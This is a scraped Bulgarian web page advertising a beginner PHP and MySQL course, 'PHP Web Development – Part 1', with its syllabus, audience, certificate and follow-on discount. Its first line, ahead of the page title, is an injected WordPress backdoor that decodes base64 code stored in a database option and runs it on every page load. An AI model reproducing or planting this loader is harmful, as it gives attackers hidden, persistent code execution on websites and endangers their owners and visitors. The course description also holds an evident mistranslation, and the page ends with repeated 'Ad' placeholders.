add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); PHP and MySQL - Part 1 - НАРС

PHP and MySQL – Part 1

Какво включва?
PHP е един от най-популярните и широко използвани в Уеб езици. PHP работи на уеб сървър, който изпълнява PHP скриптове, както и обработката на динамични уеб страници. PHP в комбинация с Linux, Apache и MySQL (LAMP platform) е много лесно, стабилно и с ниска цена open – source решение за широка гама от уеб приложения.
В този курс – “PHP Web Development – Part 1” студентите ще научат основите на езика PHP, MySQL и LAMP платформа, както и напреднали технологии за разработване на комплексни уеб сайтове. Програмата включва основи на PHP езика (променливи, низове, масиви, условно изявления, електрически вериги и др), Web форми, сесии и cookies, работа с MySQL база данни и phpMyAdmin.
Учебната програма обхваща основите на уеб програмирането, HTML, CSS, PHP. Курсът се основава на PHP 5, Apache и MySQL.

За кого е предназначен?
Курсът е предназначен за начинаещи и би бил полезен на всички кандидати с базови компютърни познания и добър английски, мотивация и желание за работа.

Какво получава всеки курсист?
Всички курсисти, преминали обучението “PHP Web Development – Part 1”, получават документ за участието си.

Заедно с това всеки участник получава отстъпка при записване за предстоящите нива на обучението:
• PHP Web Development – Part 2

Финален изпит на преминалото обучение се провежда по желание на студентите в курса, поради което не е включен в програмата.

Изтеглете програмата за курса.

Вижте цените и графика за провеждане на курсовете.

Изтеглете брошура с информация за всички курсове.

За повече информация може да се свържете с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad